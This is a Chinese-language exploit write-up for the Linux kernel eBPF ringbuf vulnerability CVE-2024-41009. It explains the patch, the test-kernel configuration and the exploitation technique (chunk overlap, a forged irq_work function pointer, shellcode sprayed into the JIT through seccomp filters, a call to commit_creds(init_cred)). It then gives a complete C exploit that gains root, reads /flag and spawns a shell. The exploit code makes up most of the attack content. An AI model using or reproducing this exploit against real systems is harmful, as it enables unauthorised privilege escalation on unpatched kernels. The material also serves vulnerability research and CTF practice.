CVE-2024-41009

漏洞分析

漏洞描述

patch

首先新增了一个计数器pending_pos，和producer_pos放在同一个页中：

漏洞出现在reserve的过程：

上述代码中pend_pos累加了ringbuf中所有的已经reverse但是还没有submit的chunk的size，

漏洞分析

这个判断中的cons_pos完全由用户态控制，那么岂不是只要保证两次的都满足条件就能绕过检查了？

同时要注意这个比较是无符号的，这样来看这个cos就完全是多余的？正常的ringbuf又用不到这个？我们只要借助这个问题构造一个多次分配总长度大于mask就可以overlap了。

环境搭建

配置：

CONFIG_DEBUG_INFO #调试符号
CONFIG_USER_NS=y #支持新的namespace
CONFIG_BPF_UNPRIV_DEFAULT_OFF=n # 默认允许非特权用户加载 eBPF

CONFIG_CGROUP_BPF=y
CONFIG_BPF=y
CONFIG_BPF_LSM=y
CONFIG_BPF_SYSCALL=y
CONFIG_ARCH_WANT_DEFAULT_BPF_JIT=y
CONFIG_BPF_JIT_ALWAYS_ON=y
CONFIG_BPF_JIT_DEFAULT_ON=y
CONFIG_BPF_PRELOAD=y
CONFIG_BPFILTER=y
CONFIG_BPFILTER_UMH=m
CONFIG_NET_CLS_BPF=y
CONFIG_NET_ACT_BPF=y
CONFIG_BPF_JIT=y
CONFIG_HAVE_EBPF_JIT=y
CONFIG_BPF_EVENTS=y
CONFIG_BPF_KPROBE_OVERRIDE=y
CONFIG_TEST_BPF=m

编译命令：

make CFLAGS_KERNEL=”-g” CFLAGS_MODULE=”-g” -j4

修改objtool:

vim tools/objtool/elf.c

漏洞利用

poc

所以首先创建一个0x4000的ringbuf_map；

然后在用户态修改consumer_pos为0x3000；

然后利用reserve分配一个0x3000的chunk，得到可写空间[8, 0x3008];

之后再reverse分配一个0x3000的chunk，这个时候new_prod_pos - cons_pos == 0, 还是小于rb->mask，因此还能继续分配，这实际上已经超出了原有的空间了；而此时分配的是[0x3008, 0x6010]，可写部分是[0x3010, 0x6010]，而根据前面的重复映射可以得知，[0x4000, 0x6010]的空间就是[0, 0x2010]的空间，这就包含了第一个chunk的数据头，因此我们就有了篡改第一个chunk数据头的能力。

结构伪造

可以看到当flags有BPF_RB_FRCE_WAKEUP标志位的时候会调用到irq_work_queue函数：

该标志的值为2：

进入到irq_work_queue函数：

irq_work结构体定义如下，可以看到其第二个成员就是一个函数指针：

irq_work相关的源码在这里：

https://elixir.bootlin.com/linux/v5.19/source/kernel/irq_work.c#L106

查看关于func函数指针的调用，在irq_work_single中找到一处：

从poc中找到如下调用链：

irq_work_single：https://elixir.bootlin.com/linux/v5.19/source/kernel/irq_work.c#L191

如果我们将chunk1的pg_off篡改成2，而data-0x2000的位置是consumer_pos所在页，因此我们就可以直接在用户态部署伪造的ringbuf结构了：

通过分析ringbuf的结构可知，work是其内部的一个成员，并不是一个指针，因此这个func函数指针也是存放在ringbuf空间的，且通过调试可知其偏移为0x28：

劫持控制流如下：

喷射shellcode

首先让rcx = 0xc0000082:

然后执行rdmsr指令：（0f 32)

执行完rdmsr指令之后：

计算地址：

在这里还遇到一个问题，就是用sc函数喷射shellcode的时候已经分配了JIT的可执行段，但是等到我们劫持控制流时这些段都被解除映射了，这里笔者的解决方案是fork一个新的进程不停地调用sc函数喷射shellcode（当然在sc函数中同样要fork大量的子进程来喷射，因为这样可以突破文件描述符的限制）；而我们的主进程则sleep一段时间，等到shellcode喷射稳定之后就去劫持控制流。

提权步骤

我们是从函数表中call进来的，我们在利用ldmsr指令泄露地址之后，计算出init_cred和commit_creds的地址，然后利用push+ret的方式调用commit_creds(init_cred)，之后commit_creds的ret会将我们的控制流重新返回到irq_work_single的上下文中，因此我们可以直接成功着陆回用户态，然后在用户态system(“/bin/sh”)即可直接提权。

调试

gdb -ex "target remote localhost:1234" -ex "file /mnt/hgfs/kernel/41009/vmlinux" -ex "c"

攻击成功

EXP

（存在一定命中概率）

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <sched.h>
#include <sys/types.h>
#include <linux/keyctl.h>

size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
    asm volatile (
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
    );
    puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

void get_root_shell(){
    printf("now pid == %p\n", getpid());
    system("/bin/sh");
}

//CPU绑核
void bindCore(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

size_t page_offset_base;
int map_fd, expmap_fd;

#include <linux/bpf.h>
#include <stdint.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include "bpf_insn.h"

static inline int bpf(int cmd, union bpf_attr *attr)
{
    return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

#include <sys/mman.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <netinet/if_ether.h>

void err_exit(char *s){
    perror(s);
    exit(-1);
}


#define VULREG \
        BPF_LD_MAP_FD(BPF_REG_1, 3),      \              
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),   \        
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),  \        
        BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, 0),     \       
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),\
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),    \      
        BPF_EXIT_INSN(),   \
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),\
        BPF_MOV64_IMM(BPF_REG_6, 100),\
        BPF_MOV64_IMM(BPF_REG_9, 0x80000000),\
        BPF_ALU64_IMM(BPF_XOR, BPF_REG_6, 0),\
        BPF_JMP_REG(BPF_JLE, BPF_REG_6, BPF_REG_9, 2),\
        BPF_ALU64_IMM(BPF_XOR, BPF_REG_6, 100),\
        BPF_MOV64_IMM(BPF_REG_9, 0),\
        BPF_JMP_REG(BPF_JLE, BPF_REG_6, BPF_REG_9, 1),\
        BPF_MOV64_IMM(BPF_REG_6, 0), \
        BPF_MOV64_IMM(BPF_REG_3, 0),\
        BPF_ALU64_IMM(BPF_XOR, BPF_REG_3, 0),\
        BPF_JMP_IMM(BPF_JLE, BPF_REG_3, 2, 2),\
        BPF_MOV64_IMM(BPF_REG_0, 0), \
        BPF_EXIT_INSN(),\
        BPF_ALU64_REG(BPF_SUB, BPF_REG_2, BPF_REG_6),




       

//最终得到reg6实际为2，确信为0，前提是map_fd传递value[0] = 1, value[1] = 0，此时reg7指向map_fd的array

#define BPF_FUNC_dynptr_from_mem 0xc5
#define BPF_FUNC_dynptr_read     0xc9
#define BPF_FUNC_dynptr_write    0xca
#define BPF_FUNC_dynptr_data     0xcb

#define BPF_FUNC_ringbuf_reserve 0x83
#define BPF_FUNC_ringbuf_submit  0x84

struct bpf_insn prog1[] = {
        BPF_MOV64_REG(BPF_REG_9, BPF_REG_1), //ctx

        BPF_LD_MAP_FD(BPF_REG_1, 3),                    
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),           
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),          
        BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, 0),            
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), //第一个参数是fd，第二个参数是&key，第三个参数 是&value
        /* if success, r0 will be ptr to value, 0 for failed */              
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),          
        BPF_EXIT_INSN(),   

        BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),   

        BPF_LD_MAP_FD(BPF_REG_1, 4),       //ringbuf_mapfd               
        BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),   

        BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), //map_ptr
        BPF_MOV64_IMM(BPF_REG_2, 0x3000), //size=0x3000
        BPF_MOV64_IMM(BPF_REG_3, 0), //flags=0
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, 0x83),//BPF_FUNC_user_ringbuf_drain
        BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -8), //store chunk1

        BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), //map_ptr
        BPF_MOV64_IMM(BPF_REG_2, 0x3000), //size=0x3000
        BPF_MOV64_IMM(BPF_REG_3, 0), //flags=0
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, 0x83),//BPF_FUNC_user_ringbuf_reserve
        BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16), //store chunk2
       
        BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),          
        BPF_JMP_IMM(BPF_JMP, BPF_REG_0, 0, 5), 
        BPF_MOV64_IMM(BPF_REG_2, 2),
        BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, 0x4000-0x3010),
        BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, 0x4000-0x3010+4), //修改pg_off

        BPF_MOV64_IMM(BPF_REG_2, 0),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, 0x84),//BPF_FUNC_user_ringbuf_submit

        BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_10, -8), //拿出chunk1
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),          
        BPF_JMP_IMM(BPF_JMP, BPF_REG_0, 0, 3),   //如果是0，直接submit chunk2   

        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
        BPF_MOV64_IMM(BPF_REG_2, 2),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, 0x84),//BPF_FUNC_user_ringbuf_submit

        
        


        BPF_MOV64_IMM(BPF_REG_0, 0), 
        BPF_EXIT_INSN(),
};


#define BPF_LOG_SZ 0x20000
char bpf_log_buf[BPF_LOG_SZ] = { '\0' };
int load_prog(struct bpf_insn prog[], int cnt){
    
    int prog_fd;
    union bpf_attr attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insns = (uint64_t) prog,
        .insn_cnt = cnt,
        .license = (uint64_t) "GPL",
        .log_level = 2,
        .log_buf = (uint64_t) bpf_log_buf,
        .log_size = BPF_LOG_SZ,
    };
    prog_fd = bpf(BPF_PROG_LOAD, &attr);
    if (prog_fd < 0) {
        puts(bpf_log_buf);
        perror("BPF_PROG_LOAD");
        return -1;
    }			
    //puts(bpf_log_buf);
    printf("prog_fd == %d\n", prog_fd);

    return prog_fd;

    
}

void trigger_prog(int prog_fd){
    int sockets[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)
        perror("socketpair()");

    if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0)
        perror("socketpair SO_ATTACH_BPF");
	char s[0x1000];
	int wl = write(sockets[0], s, 0x100);
    //printf("wl == %d\n", wl);
}





static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
               unsigned int value_size, unsigned int max_entries)
{
        union bpf_attr attr = {
                .map_type = map_type,
                .key_size = key_size,
                .value_size = value_size,
                .max_entries = max_entries,
        };
        return bpf(BPF_MAP_CREATE, &attr);
}

static __always_inline int
bpf_map_get_elem(int map_fd, const void *key, void *value)
{
    union bpf_attr attr = {
        .map_fd = map_fd,
        .key = (uint64_t)key,
        .value = (uint64_t)value,
    };

    // 使用 BPF_MAP_LOOKUP_ELEM 获取 map 中的元素
    return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

static __always_inline uint32_t
bpf_map_get_info_by_fd(int map_fd)
{
        struct bpf_map_info info;
        union bpf_attr attr = {
                .info.bpf_fd = map_fd,
                .info.info_len = sizeof(info),
                .info.info = (uint64_t)&info,

        };
        bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
        return info.btf_id;
}

static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags)
{
        union bpf_attr attr = {
                .map_fd = map_fd,
                .key = (uint64_t)key,
                .value = (uint64_t)value,
                .flags = flags,
        };
        return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}

size_t ker_offset;


int create_bpf_array_of_map(int fd, int key_size, int value_size, int max_entries) {
    union bpf_attr attr = {
        .map_type = BPF_MAP_TYPE_ARRAY_OF_MAPS,
        .key_size = key_size,
        .value_size = value_size,
        .max_entries = max_entries,
//        .map_flags = BPF_F_MMAPABLE,
        .inner_map_fd = fd,
    };

    int map_fd = syscall(SYS_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
    if (map_fd < 0) {
        return -1;
    }
    return map_fd;
}



#include <linux/filter.h>
#include <linux/seccomp.h>
char buf[0x1000];
struct sock_filter filter[0x1000];
const int DRR_CLASS_SPRAY_THREADS = 0x100;

int sc(void)
{   
    int cmd[2], reply[2], endp[2];
    if(pipe(cmd) < 0){
        perror("pipe cmd");
    }
    if(pipe(reply) < 0){
        perror("pipe reply");
    }
    if(pipe(endp) < 0){
        perror("pipe endp");
    }

    struct sock_filter filter[0x1000] ;
    /*= {
        // Allow `write` syscall
        
        {.code = BPF_LD + BPF_K, .k = 0XB3909090},
        {.code = BPF_RET | BPF_K, .k = SECCOMP_RET_ALLOW}
        
    };*/
    for(int i = 0; i < 0x1000; i++) filter[i].code = BPF_LD + BPF_K, filter[i].k = 0XB3909090;
    filter[0xfff].code = BPF_RET | BPF_K, filter[0xfff].k = SECCOMP_RET_ALLOW;
    int k = 0xf00;
    /*
    init_cred = entry_SYSCALL_64 + 0xa505c0
    commit_creds = entry_SYSCALL_64 - 0xd63f90
    */
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB390c0b1; //mov cl, 0xc0
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB318e1c1; //shl ecx, 24
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB39082b1; //mov cl, 0x82
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB390320f; //rdsmr
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB3c93148; //xor rcx, rcx
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB39020b1; //mov cl, 0x20
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB3e2d348; //shl rdx, cl
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB3c20148; //add rdx, rax ; rdx = entry_SYSCALL_64

    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB3c93148; //xor rcx, rcx
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB390a5b1; //mov cl, 0xa5
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB308e1c1; //shl ecx, 8
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB39005b1; //mov cl, 0x05
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB308e1c1; //shl ecx, 8
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB390c0b1; //mov cl, 0xc0 ; ecx = 0xa505c0
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB3d08949; // mov r8, rdx
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB3c80149; // add r8, rcx ; rcx = &init_cred

    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB3c93148; //xor rcx, rcx
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB390d6b1; //mov cl, 0xd6
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB308e1c1; //shl ecx, 8
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB3903fb1; //mov cl, 0x3f
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB308e1c1; //shl ecx, 8
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB39090b1; //mov cl, 0x90 ; ecx = 0xd63f90
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB3d18949; // mov r9, rdx
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB3c92949; //sub r9, rcx ; r9 = commit_creds

    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB3c7894c; //mov rdi, r8
    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB3c35141; //push r9;ret;

    filter[k].code = BPF_LD + BPF_K, filter[k++].k = 0XB3c3c3c3; //ret

    filter[0].code = BPF_RET | BPF_K, filter[0].k = SECCOMP_RET_ALLOW;

    
    
    
    

    struct sock_fprog prog = {
        .len = sizeof(filter) / sizeof(filter[0]),
        .filter = (struct sock_filter*)filter,
    };
    int fd[2];
    for(int i = 0; i < 0x50; i++){
        if(!fork()){
            read(cmd[0], buf, 1);
            for(int j = 0; j < 0x10; j++){
                socketpair(AF_UNIX, SOCK_DGRAM, 0, fd);
                setsockopt(fd[0], SOL_SOCKET, SO_ATTACH_FILTER, &prog, sizeof(prog));
            }
            write(reply[1], buf, 1);
            write(fd[1], buf, 0x100);
            sleep(1000);
            read(endp[0], buf, 1);
            exit(0);
        }
    }
    write(cmd[1], buf, 0x50);
    read(reply[0], buf, 0x50);
    
    puts("spray shellcode done");
    getchar();

}

/*
0xffffffffc02ab000 ~ 0xffffffffc151c000
0xffffffffc0321000 ~ 0xffffffffc03eb000
0xffffffffc0102000 ~ 0xffffffffc0fd7000

*/


int main(){

    save_status();
    bindCore(0);
    //unshare_setup();

    map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);
    if (map_fd < 0) perror("BPF_MAP_CREATE");//, err_exit("BPF_MAP_CREATE");
    //printf("map_fd == %d\n", map_fd);

    expmap_fd = bpf_map_create(BPF_MAP_TYPE_RINGBUF, 0, 0, 0x4000);
    if (expmap_fd < 0) perror("BPF_MAP_CREATE");//, err_exit("BPF_MAP_CREATE");
    printf("ringbuf_map_fd == %d\n", expmap_fd);

    size_t key = 0;
    size_t value[0x1000];
    
    size_t *cons = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, expmap_fd, 0);
    cons[0] = 0x3000;
    cons[0x28/8] = 0xffffffffc033006b;//0xffffffffc0322500;//0xffffffffc032452d;//0xffffffffc0322500;

    if(!fork()){
        while(1){
            sc();
        }
    }
    sleep(2);
    trigger_prog(load_prog(&prog1, sizeof(prog1)/sizeof(prog1[0])));
    
    int f = open("/flag", 0);
    printf("flag fd == %d\n", f);
    char flag[0x100];
    read(f, flag, 0x100);
    write(1, flag, 0x100);
    system("/bin/sh");
    puts("end");
    getchar();

    return 0;
    
    
    

    
    
}

参考

https://lore.kernel.org/linux-cve-announce/2024071715-CVE-2024-41009-cac5@gregkh/T/

https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=d1b9df0435bc61e0b44f578846516df8ef476686

https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2024-41009_lts_cos/exploit/lts-6.6.32/exploit.c